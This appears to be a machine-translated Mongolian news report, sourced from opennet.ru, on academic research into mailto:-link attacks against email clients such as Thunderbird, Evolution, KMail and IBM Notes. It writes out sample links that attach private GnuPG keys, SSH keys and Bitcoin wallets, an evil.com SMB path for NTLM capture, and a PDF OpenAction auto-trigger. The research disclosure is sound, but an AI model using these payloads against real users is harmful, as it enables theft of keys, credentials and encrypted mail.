"mailto:" холбоосыг ашиглан цахим шуудангийн үйлчлүүлэгч рүү халдаж байна

Бохумын Рурын их сургуулийн судлаачид (Герман) дүн шинжилгээ хийсэн (PDF) дэвшилтэт параметр бүхий "mailto:" холбоосыг боловсруулах үед захидлын үйлчлүүлэгчдийн зан байдал. Шалгасан XNUMX имэйл үйлчлүүлэгчийн тав нь "хавсрах" параметрийг ашиглан нөөцийг орлуулах халдлагад өртөмтгий байсан. Нэмэлт зургаан имэйл клиент PGP болон S/MIME түлхүүр солих халдлагад өртөж, гурван үйлчлүүлэгч шифрлэгдсэн мессежийн агуулгыг задлах халдлагад өртөмтгий байсан.

Холбоосууд «Mailto:"нь холбоос дээр заасан хаяг хүлээн авагч руу захидал бичихийн тулд цахим шуудангийн клиентийг автоматжуулахад ашигладаг. Та хаягаас гадна захидлын сэдэв, ердийн агуулгын загвар гэх мэт нэмэлт параметрүүдийг холбоосын нэг хэсэг болгон зааж өгч болно. Санал болгож буй халдлага нь үүсгэсэн зурваст хавсралт хавсаргах боломжийг олгодог "хавсрах" параметрийг удирддаг.

Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) болон Pegasus Mail зэрэг шуудангийн үйлчлүүлэгчид автоматаар хавсаргах боломжийг олгодог халдлагад өртөмтгий байсан. "mailto:?attach=path_to_file" гэх мэт холбоосоор тодорхойлогдсон аливаа дотоод файл. Файлыг анхааруулгагүйгээр хавсаргасан тул онцгой анхаарал хандуулахгүй бол хэрэглэгч захидал хавсралтын хамт илгээгдэхийг анзаарахгүй байж магадгүй юм.

Жишээлбэл, "mailto" гэх мэт холбоосыг ашиглан:[имэйлээр хамгаалагдсан]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" та GnuPG-с хувийн түлхүүрүүдийг үсэг рүү оруулах боломжтой. Та мөн крипто түрийвч (~/.bitcoin/wallet.dat), SSH түлхүүр (~/.ssh/id_rsa) болон хэрэглэгчийн хандах боломжтой аливаа файлын агуулгыг илгээх боломжтой. Түүнчлэн Thunderbird нь “attach=/tmp/*.txt” гэх мэт бүтцийг ашиглан маск ашиглан бүлэг файл хавсаргах боломжийг танд олгоно.

Дотоод файлуудаас гадна зарим имэйл клиентүүд IMAP сервер дэх сүлжээний хадгалалт болон замуудын холбоосыг боловсруулдаг. Ялангуяа, IBM Notes нь "attach=\\evil.com\dummyfile" гэх мэт холбоосыг боловсруулахдаа сүлжээний лавлахаас файл шилжүүлэх, халдагчийн удирддаг SMB сервер рүү холбоос илгээх замаар NTLM баталгаажуулалтын параметрүүдийг таслан зогсоох боломжийг олгодог. (хүсэлтийг одоогийн баталгаажуулалтын параметрийн хэрэглэгчтэй хамт илгээх болно).

Thunderbird нь “attach=imap:///fetch>UID>/INBOX>1/” гэх мэт хүсэлтүүдийг амжилттай боловсруулдаг бөгөөд энэ нь танд IMAP сервер дээрх фолдеруудаас контент хавсаргах боломжийг олгодог. Үүний зэрэгцээ, OpenPGP болон S/MIME-ээр шифрлэгдсэн IMAP-аас авсан мессежийг илгээхийн өмнө шуудангийн клиент автоматаар тайлдаг. Thunderbird-ийн хөгжүүлэгчид байсан мэдэгдсэн хоёрдугаар сард асуудлын талаар болон дугаарт Thunderbird 78 Асуудал аль хэдийн шийдэгдсэн (Thunderbird-ийн 52, 60, 68 салбарууд эмзэг хэвээр байна).

Thunderbird-ийн хуучин хувилбарууд нь судлаачдын санал болгосон PGP болон S/MIME дээрх хоёр өөр халдлагад өртөмтгий байсан. Ялангуяа Thunderbird, мөн OutLook, PostBox, eM Client, MailMate, R2Mail2 нь шуудангийн клиент нь S/MIME мессежээр дамжсан шинэ сертификатуудыг автоматаар импортлож, суулгаснаас үүдэлтэй түлхүүр солих халдлагад өртсөн. халдагч нь хэрэглэгчийн аль хэдийн хадгалсан нийтийн түлхүүрүүдийг солих ажлыг зохион байгуулах.

Thunderbird, PostBox, MailMate-ийн өртөмтгий хоёр дахь халдлага нь ноорог мессежийг автоматаар хадгалах механизмын онцлогийг удирдаж, mailto параметрүүдийг ашиглан шифрлэгдсэн мессежийн шифрийг тайлах эсвэл дурын мессежүүдэд дижитал гарын үсэг нэмэх боломжийг олгодог. Үр дүнг халдагчийн IMAP сервер рүү дараа нь дамжуулах. Энэ халдлагад шифр текстийг "бие" параметрээр дамжуулж, халдагчийн IMAP сервер рүү залгахад "meta refresh" хаягийг ашигладаг. Жишээлбэл: ' '

Хэрэглэгчийн оролцоогүйгээр "mailto:" холбоосыг автоматаар боловсруулахын тулд тусгайлан боловсруулсан PDF баримтуудыг ашиглаж болно - PDF доторх OpenAction үйлдэл нь баримтыг нээх үед mailto зохицуулагчийг автоматаар ажиллуулах боломжийг олгоно.

%PDF-1.5
1 объект
<< /Төрөл /Каталог /OpenAction [2 0 R] >>
endobj

2 объект
<< /Төрөл /Үйлдэл /S /URI/URI (mailto:?body=—— PGP MESSAGE ЭХЛҮҮЛЭХ——[…])>>
endobj

"mailto:" холбоосыг ашиглан цахим шуудангийн үйлчлүүлэгч хэрэглэгчдэд халдаж байна

Эх сурвалж: opennet.ru

сэтгэгдэл нэмэх